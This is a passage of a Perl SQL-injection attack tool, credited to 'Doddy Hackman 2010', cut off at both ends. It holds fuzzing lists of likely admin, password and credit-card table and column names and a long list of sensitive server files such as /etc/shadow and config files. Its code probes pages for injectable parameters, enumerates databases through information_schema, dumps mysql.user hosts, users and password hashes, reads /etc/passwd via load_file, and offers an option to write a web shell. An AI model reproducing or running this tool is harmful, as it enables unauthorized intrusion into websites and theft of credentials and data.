s?rie','param?tre','?tat','stocker','texte','cvvnumber');

@buscar2 = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email','senha','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail','cliente','usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','host','pws','cedula','userName','host_password','chave','alias','apellido_nombre','cliente_nombre','cliente_email','cliente_pass','cliente_user','cliente_usuario','login_id','sistema_id','author','user_login','admin_user','admin_pass','uh_usuario','uh_password','psw','host_username','sistema_usuario','auth','key','usuarios_nombre','usuarios_nick','usuarios_password','user_clave','membername','nme','unme','password','user_password','autores','pass_hash','hash','pass','correo','usuario_nombre','usuario_nick','usuario_password','userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors','user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username','tbladmins','sort','_wfspro_admin','4images_users','a_admin','account','accounts','adm','admin','admin_login','admin_userinfo','administer','administrable','administrate','administration','administrator','administrators','adminrights','admins','adminuser','art','article_admin','articles','artikel','ÃÜÂë','aut','autore','backend','backend_users','backenduser','bbs','book','chat_config','chat_messages','chat_users','client','clients','clubconfig','company','config','contact','contacts','content','control','cpg_config','cpg132_users','customer','customers','customers_basket','dbadmins','dealer','dealers','diary','download','Dragon_users','e107.e107_user','e107_user','forum.ibf_members','fusion_user_groups','fusion_users','group','groups','ibf_admin_sessions','ibf_conf_settings','ibf_members','ibf_members_converge','ibf_sessions','icq','images','index','info','ipb.ibf_members','ipb_sessions','joomla_users','jos_blastchatc_users','jos_comprofiler_members','jos_contact_details','jos_joomblog_users','jos_messages_cfg','jos_moschat_users','jos_users','knews_lostpass','korisnici','kpro_adminlogs','kpro_user','links','login_admin','login_admins','login_user','login_users','logins','logs','lost_pass','lost_passwords','lostpass','lostpasswords','m_admin','main','mambo_session','mambo_users','manage','manager','mb_users','member','memberlist','members','minibbtable_users','mitglieder','movie','movies','mybb_users','mysql','mysql.user','names','news','news_lostpass','newsletter','nuke_authors','nuke_bbconfig','nuke_config','nuke_popsettings','nuke_users','ÓÃ»§','obb_profiles','order','orders','parol','partner','partners','passes','passwords','perdorues','perdoruesit','phorum_session','phorum_user','phorum_users','phpads_clients','phpads_config','phpbb_users','phpBB2.forum_users','phpBB2.phpbb_users','phpmyadmin.pma_table_info','pma_table_info','poll_user','punbb_users','pwds','reg_user','reg_users','registered','reguser','regusers','session','sessions','settings','shop.cards','shop.orders','site_login','site_logins','sitelogin','sitelogins','sites','smallnuke_members','smf_members','SS_orders','statistics','superuser','sysadmins','system','sysuser','sysusers','table','tables','tb_admin','tb_administrator','tb_login','tb_member','tb_members','tb_user','tb_username','tb_usernames','tb_users','tbl','tbl_user','tbl_users','tbluser','tbl_clients','tbl_client','tblclients','tblclient','test','usebb_members','user_admin','user_info','user_list','user_logins','user_names','usercontrol','userinfo','userlist','userlogins','usernames','userrights','users','vb_user','vbulletin_session','vbulletin_user','voodoo_members','webadmin','webadmins','webmaster','webmasters','webuser','webusers','x_admin','xar_roles','xoops_bannerclient','xoops_users','yabb_settings','yabbse_settings','ACT_INFO','ActiveDataFeed','Category','CategoryGroup','ChicksPass','ClickTrack','Country','CountryCodes1','CustomNav','DataFeedPerformance1','DataFeedPerformance2','DataFeedPerformance2_incoming','DataFeedShowtag1','DataFeedShowtag2','DataFeedShowtag2_incoming','dtproperties','Event','Event_backup','Event_Category','EventRedirect','Events_new','Genre','JamPass','MyTicketek','MyTicketekArchive','News','PerfPassword','PerfPasswordAllSelected','Promotion','ProxyDataFeedPerformance','ProxyDataFeedShowtag','ProxyPriceInfo','Region','SearchOptions','Series','Sheldonshows','StateList','States','SubCategory','Subjects','Survey','SurveyAnswer','SurveyAnswerOpen','SurveyQuestion','SurveyRespondent','sysconstraints','syssegments','tblRestrictedPasswords','tblRestrictedShows','TimeDiff','Titles','ToPacmail1','ToPacmail2','UserPreferences','uvw_Category','uvw_Pref','uvw_Preferences','Venue','venues','VenuesNew','X_3945','tblArtistCategory','tblArtists','tblConfigs','tblLayouts','tblLogBookAuthor','tblLogBookEntry','tblLogBookImages','tblLogBookImport','tblLogBookUser','tblMails','tblNewCategory','tblNews','tblOrders','tblStoneCategory','tblStones','tblUser','tblWishList','VIEW1','viewLogBookEntry','viewStoneArtist','vwListAllAvailable','CC_info','CC_username','cms_user','cms_users','cms_admin','cms_admins','jos_user','table_user','bulletin','cc_info','login_name','admuserinfo','userlistuser_list','SiteLogin','Site_Login','UserAdmin','Admins','Login','Logins');


@buscar3 =('c:/xampp/log.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog');

use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common;
use URI::Split qw(uri_split);

my $nave = LWP::UserAgent->new();
$nave->timeout(5);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

&head;
unless(@ARGV == 2) {
&menu;
} else {
&scan($ARGV[0],$ARVG[1]);
}
&finish;

sub menu {
print "[Page] : ";
chomp(my $page=<STDIN>);
print "\n[Bypass : -- /* %00] : ";
chomp(my $bypass = <STDIN>);
print "\n\n";
&scan($page,$bypass);
}

sub scan {
print "[Status] : Scanning.....\n";
$pass = &bypass($_[1]);
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
if ($_[0]=~/hackman/ig) {
savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
&menu_options($_[0],$pass,$save);
}
my ($gen,$save,$control) = &length($_[0],$_[1]);
if ($control eq 1) {
print "[Status] : Enjoy the menu\n\n";
&menu_options($gen,$pass,$save);
} else {
print $control;
print "[Status] : Length columns not found\n\n";
<STDIN>;
&head;
&menu;
}
}

sub head {
system 'cls';
print qq(


 @      @@   @             
@@     @  @ @@             
 @ @@  @  @  @ @   @ @ @@@ 
 @ @   @  @  @@ @ @@@ @  @ 
 @@    @  @  @  @  @   @@@ 
 @ @   @  @  @  @  @  @  @ 
@@@ @   @@   @@@  @@@ @@@@@




);
}




sub copyright {
print "\n\n\n\n(C) Doddy Hackman 2010\n\n";
}


sub toma {
return $nave->request (GET $_[0])->content;
}


sub savefile {
open (SAVE,">>logs/webs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}

sub finish {
print "\n\n\n(C) Doddy Hackman 2010\n\n";
<STDIN>;
exit(1);
}


sub length {
my $rows  = "0";
my $asc;
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$inyection = $page."1".$pass1."and".$pass1."1=0".$pass1."order".$pass1."by"."9999999999".$pass2;
$code = toma($inyection);
if($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
$code1 = toma($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
my $patha = $1;
chomp $patha;
$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
$total = "1";
for my $rows(2..200) {
$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")"; 
$total.= ",".$rows;
$injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
$test = toma($injection);
if ($test=~/RATSXPDOWN/) {
@number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
$control = 1;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
savefile($save.".txt","\n[Target confirmed] : $page");
savefile($save.".txt","[Bypass] : $_[1]\n");
savefile($save.".txt","[Limit] : The site has $rows columns");
savefile($save.".txt","[Data] : The number @number print data");
if ($patha) {
savefile($save.".txt","[Full Path Discloure] : $patha");
}
$total=~s/$number[0]/hackman/;
savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
}
}
}
}

sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}

sub ascii {
return join ',',unpack "U*",$_[0]; 
}

sub ascii_de {
$_[0] = join q[], map { chr } split q[,],$_[0];
return $_[0];
}

sub details {
my ($page,$bypass,$save) = @_;
($pass1,$pass2) = &bypass($bypass);
savefile($save.".txt","\n");
if ($page=~/(.*)hackman(.*)/ig) {
print "\n\n[+] Searching information..\n\n"; 
my  ($start,$end) = ($1,$2);
$inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
$mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
$test1 = toma($inforschema);
$test2 = toma($mysqluser);
if ($test2=~/ERTOR854/ig) {
savefile($save.".txt","[mysql.user] : ON");
print "[mysql.user] : ON\n";
} else {
print "[mysql.user] : OFF\n";
savefile($save.".txt","[mysql.user] : OFF");
}
if ($test1=~/ERTOR854/ig) {
print "[information_schema.tables] : ON\n";
savefile($save.".txt","[information_schema.tables] : ON");
} else {
print "[information_schema.tables] : OFF\n";
savefile($save.".txt","[information_schema.tables] : OFF");
}
if ($test3=~/ERTOR854/ig) {
print "[+] load_file permite ver los archivos\n";
savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
}
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"; 
$injection = $start.$concat.$end.$pass2;
$code = toma($injection);
if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
} else {
print "\n[-] Not found any data\n";
}
}
}
}

sub menu_options {
print "[Target confirmed] : $_[0]\n";
print "[Bypass] : $_[1]\n\n";

my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
print "[save] : /logs/webs/$save\n\n";
print "\n\n--== information_schema.tables ==--\n\n";
print "[1] : Show tables\n";
print "[2] : Show columns\n";
print "[3] : Show DBS\n";
print "[4] : Show tables with other DB\n";
print "[5] : Show columns with other DB\n";
print "\n\n--== mysql.user ==--\n\n";
print "[6] : Show users\n";
print "\n\n--== Others ==--\n\n";
print "[7] : Fuzzing tables\n";
print "[8] : Fuzzing columns\n";
print "[9] : Fuzzing files with load_file\n";
print "[10] : Dump\n";
print "[11] : Informacion of the server\n";
print "[12] : Create a shell with into outfile\n";
print "[13] : Show Log\n";
print "[14] : Change Target\n";
print "[15] : Exit\n";
print "\n\n[Option] : ";
chomp(my $opcion = <STDIN>);
if ($opcion eq "1") {
schematables($_[0],$_[1],$save);
&reload;	
}
elsif ($opcion eq "2") {
print "\n\n[Tabla] : ";
chomp(my $tabla = <STDIN>);
schemacolumns($_[0],$_[1],$save,$tabla);
&reload;
}
elsif ($opcion eq "3") {
&schemadb($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "4") {
print "\n\n[DAtabase] : ";
chomp(my $data =<STDIN>);
&schematablesdb($_[0],$_[1],$data,$save);
&reload;
}
elsif ($opcion eq "5"){
print "\n\n[DB] : ";
chomp(my $db =<STDIN>);
print "\n[Table] : ";
chomp(my $table =<STDIN>);
&schemacolumnsdb($_[0],$_[1],$db,$table,$save);
&reload;
}
elsif ($opcion eq "6") {
&mysqluser($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "13") {
$t = "logs/webs/$save.txt";
system("start $t");
&reload;
}
elsif ($opcion eq "15") {
&finish;
}
elsif ($opcion eq "14") {
&head;
&menu;
}
elsif ($opcion eq "7") {
&tabfuzz($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "8") {
print "\n\n[Tabla] : ";
chomp(my $tab  = <STDIN>);
&colfuzz($_[0],$_[1],$tab,$save);
&reload;
}
elsif ($opcion eq "9") {
&load($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "10") {
print "\n\n[Table to dump] : ";
chomp(my $tabla = <STDIN>);
print "\n[Column 1] : ";
chomp(my $col1 = <STDIN>);
print "\n[Column 2] : ";
chomp(my $col2 = <STDIN>);
print "\n\n";
&dump($_[0],$col1,$col2,$tabla,$_[1],$save);
&reload;
}
elsif ($opcion eq "11") {
print "\n\n";
&details($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "12") {
print "\n\n[Full Path Discloure] : ";
chomp(my $path = <STDIN>);
&into($_[0],$_[1],$path,$save);
&reload;
}
else {
&reload;
}
}

sub schematables {
$real = "1";
my ($page,$bypass,$save) = @_;
savefile($save.".txt","\n");
print "\n";
my $page1 = $page;
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","[DB] : default");
print "[+] Searching tables with schema\n\n";
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
my $resto = $1;
$total = $resto - 17; 
print "[+] Tables Length :  $total\n\n";
savefile($save.".txt","[+] Searching tables with schema\n");
savefile($save.".txt","[+] Tables Length :  $total\n");
my $limit = $1;
for my $limit(17..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
print "[Table $real Found : $table ]\n";
savefile($save.".txt","[Table $real Found : $table ]");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}	 
}
sub reload {
print "\n\n[+] Finish\n\n";
<STDIN>;
&head;
&menu_options;
}


sub schemacolumns {
my ($page,$bypass,$save,$table) = @_;
my $page3 = $page;
my $page4 = $page;
savefile($save.".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($bypass);
print "\n[DB] : default\n";
savefile($save.".txt","[DB] : default");
savefile($save.".txt","[Table] : $table\n");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns Length : $1 ]\n\n";
savefile($save.".txt","[Columns Length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
print "[Column $real] : $1\n"; 
savefile($save.".txt","[Column $real] : $1");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}}

sub schemadb {
my ($page,$bypass,$save) = @_;
my $page1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Searching DBS\n\n";
($pass1,$pass2) = &bypass($bypass);
$page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page.$pass1."from".$pass1."information_schema.schemata");
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $limita = $1;
print "[+] Databases Length : $limita\n\n";
savefile($save.".txt","[+] Databases Length : $limita\n");
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit(0..$limita) {
$code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $control = $1;
if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
print "[Database $real Found] $control\n";
savefile($save.".txt","[Database $real Found] : $control");
$real++;
}
}
}
} else {
print "[-] information_schema = ERROR\n";
}
}

sub schematablesdb {
my $page = $_[0];
my $db = $_[2];
my $page1 = $page;
savefile($_[3].".txt","\n");
print "\n\n[+] Searching tables with DB $db\n\n";
($pass1,$pass2) = &bypass($_[1]);
savefile($_[3].".txt","[DB] : $db");
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
print "[+] Tables Length :  $1\n\n";
savefile($_[3].".txt","[+] Tables Length :  $1\n");
my $limit = $1;
$real = "1";
for my $lim(0..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
savefile($_[3].".txt","[Table $real Found : $table ]");
print "[Table $real Found : $table ]\n";
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}}

sub schemacolumnsdb {
my ($page,$bypass,$db,$table,$save) = @_;
my $page3 = $page;
my $page4 = $page;
print "\n\n[+] Searching columns in table $table with DB $db\n\n";
savefile($save.".txt","\n");
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","\n[DB] : $db");
savefile($save.".txt","[Table] : $table");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns length : $1 ]\n\n";
savefile($save.".txt","[Columns length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
print "[Column $real] : $1\n";
savefile($save.".txt","[Column $real] : $1");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}}

sub mysqluser {
my ($page,$bypass,$save) = @_;
my $cop = $page;
my $cop1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Finding mysql.users\n";
($pass1,$pass2) = &bypass($bypass);
$page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
$code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
if ($code=~/RATSXPDOWN/ig){
$cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n\n[+] Users Found : $1\n\n";
savefile($save.".txt","\n[+] Users mysql Found : $1\n");
for my $limit(0..$1) { 
$cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
$code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
print "[Host] : $1 [User] : $2 [Password] : $3\n";
savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
} else {
&reload;
}}}
} else {
